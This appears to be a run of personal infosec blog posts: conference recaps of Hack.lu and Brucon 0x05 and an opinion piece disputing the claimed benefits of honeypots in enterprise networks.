After the conference on Wednesday all the speakers were herded into town for a rather awesome meal at a little Mexican place. It was a great evening with good food and cold beverages keeping us fueled. After which some brave souls (not me) decided to see what the town of Luxembourg had to offer. The rest of us returned to the bar to ensure that the population of beer didn’t get too high.

* Barcon / Hallwaycon

Barcon/Hallwaycon was awesome this year. After the day was finished most of the conference attendees ended up in the bar (as is our wont). Great conversations and interesting discussions continued into the night (and early mornings) on most nights. Snickers and sandwiches were also liberated, but that’s a story for another evening.

Wrap-up

Hack.lu is a smaller but awesome con. If it’s not on your list of “I must go here, drink beer and learn stuff” then it should be. Since starting with Brucon, I’ve been a huge fan of conferences where you can get one on one time with the speakers. More so if it can be done over a cold beer that doesn’t cost a small fortune. Smaller things like lightning talks, CTFs and dedicated workshop days also make the con a little more awesome.

See you next year.

On Honeypots

Recently I came across this post on honeypots in the enterprise. It makes some good points, but at the same time there are a few points that I disagree with. I also found it very telling that the Honeynet Project wasn’t mentioned at all. The poster said he had reached out to some of the project’s higher-ups and not gotten a response. Strange.

Anyway…here are my thoughts on the points made.

1. Low false positives, high success

Without giving concrete examples of what honeypots should be deployed for what end purpose, it’s difficult to say whether or not the false positive rate would be high or low. I’ve deployed a couple of Dionaea pots in various environments and the amount of noise generated by Conficker strains on this pot vastly outweighed any use given by the other options available with this particular honeypot. Any analyst looking after this honeypot would be hard pressed to find any useful information in the noise.

2. Able to confuse attackers

I’d say that yes, you’d confuse a certain type of attacker, but given the availability of most honeypot software, any attacker worth his or her salt would be able to fingerprint and avoid any honeypot deployments in an environment. I remember an interview with Chris Nickerson and Lenny Zeltser on Exotic Liability where this subject came up, and it was very interesting. I’d agree with Chris that finding a honeypot on a network assessment would simply make me more interested in that particular network. I’d know that the guys looking after the network have at least a basic understanding of network security and that getting into this network isn’t going to be a simple walk in the park. Challenge accepted, as it were. Yes, you will confuse basic attackers, but if anything you’re going to get the decent attackers more excited about your network. Which can’t be a good thing.

I do like the idea of honey tokens. More interesting is the concept of Honey Docs. I’d really like to spend a little more time playing with this.

3. Only a time sink, if you allow it

Yeah, I have nothing here. These are good points to make. I might have mentioned that not all businesses are mature enough in the information security space to warrant putting up honeypots. I know I’ve deployed them in the past with many good intentions, but the intelligence they provided was only useful to me wanting to learn more about security rather than being of use to the business in question.

4. Help train your security team

Again, this would boil down to the maturity of the company. Given that a large percentage of companies are still failing at the basics and getting owned that way, a honeypot isn’t really going to help too much.

5. Many free options

Yes, there are many awesome free options available out there. But are they right for your company, and will they provide useful intelligence?

Side note

I found it strange that KFSensor was suggested. The price tag on the software isn’t too bad but there are so many great Open Source solutions available. It also looks like it hasn’t been updated in a while…but that may just be me being a bit picky.

Anyway. Please take this article as it was intended, with a large pinch of salt. I’m finding myself a little at odds with honeypots of late, but I put that down to being a bit of a grumpy bastard because of the 8 months of winter we have to endure here.

The guy who wrote the article clearly put effort into it and given the small Twitter conversation we had after my initial Tweet I’d say this is more me being a bit of a jerk than anything else.

Brucon 0x05

Brucon celebrated its fifth year this year. And what a celebration it was. @blackswanburst and I headed out to Ghent a little early this year to help out with the three-day training that went on. There were some very interesting classes taking place, with everything from malware analysis to mobile penetration testing.

Interesting talks

Alas we didn’t get much time to see that many talks. Eireann and I were still pretty busy preparing the slides and demo stuff for our workshop. More on that a little later. The great thing about Brucon is that being a smaller conference, you get to sit down with the main speakers and actually have a decent conversation with them. Something that’s just not possible at the bigger conferences. This was the case again this year with many beers and great talk (not all of it shop related) happening throughout the conference time.

When I did get a chance to sit down and digest a talk I really did enjoy these two talks:

Dan Guido - CEO of Trail of Bits

A very interesting look at crimeware kits and how they’re not really using cutting edge exploits that we sometimes think they are. Dan showed how his students with just a little training and guidance came up with more reliable exploits. He also highlighted how we suck at protecting end points. With just a little work on the end point, a lot of these exploits can and will be mitigated.

Russ Gideon - Paint by Numbers vs. Monet

This was a pretty interesting look at APT attacks and how they move laterally once inside a network. There was a good discussion around common tools and how we think they bypass detection with a little tweaking. This was shown to be false. It’s always interesting to get a little insight into how real world attacks happen and how the attackers do their thing. It seems to be an increasing theme within the industry to get pentesters to behave more like real attackers and less like simple tool jockeys. I know this isn’t the case with some of the better companies, but I also know that there are many places that are guilty of the “just rename this Nessus report and we’re done” deal.

Workshops

Christopher Lytle - Crypto by example

I was hoping to sit in on this workshop simply because crypto is not a strong point with me. Alas, I got to the venue too late and the class was already overflowing. I also didn’t know that the class ran over both days. Live and learn I guess. Chris’ laptop blew up that night and he ended up giving the second day’s class on paper, which he drew up from memory. Bad. Ass…

Lightning Talks

As with any conference, I wasn’t able to attend the first day’s lightning talks because they were at the same time as our workshop. I hear they went well, and thankfully Wicked Clown wasn’t attending, which meant someone else could win top prize :)

The second day’s lightning talks were also very good, with some new and interesting talks. I particularly enjoyed Marc’s talk on abusing AWS EC2 machines using keys found through a quick and dirty search on Github. He threw together some pretty cool scripts which I’m hoping to get my hands on at some point in the future. Well done to Marc for winning day two. It was well deserved.

The After Party

IO Active put on quite a show for the attendees. Brucon and the organizers have always gone that extra mile to allow some information flooded geeks a little time to let their hair down. Fantastic music by DJ Jackalope, Count Ninjula and Keith Meyers blasted well into the night. Enough can’t be said about that night. And more shouldn’t be said by those that were there :)

Wrap Up

I’ve been to the last four Brucons now and each one has managed to outdo the last in terms of great speakers, awesome content and general awesome sauce. Wim, Clement, Marie, Seba and the whole volunteer crew know how to put on a great conference. I know I’m not alone in saying a big thank you to all of you. My only comment would be to get the workshops in the same building as the main conference. It’s a small pain in the butt to have to walk between the main conference hall and the workshop venue. I know this has always been a challenge for the Brucon crew and it’s not easy to get everything 100% right given the scope of the conference. As I’ve always said previously, if you have a chance to come to Brucon, do so…you won’t be disappointed.

I’d like to send a big thank you out to everyone who made this year another great Brucon for me. You know who you are.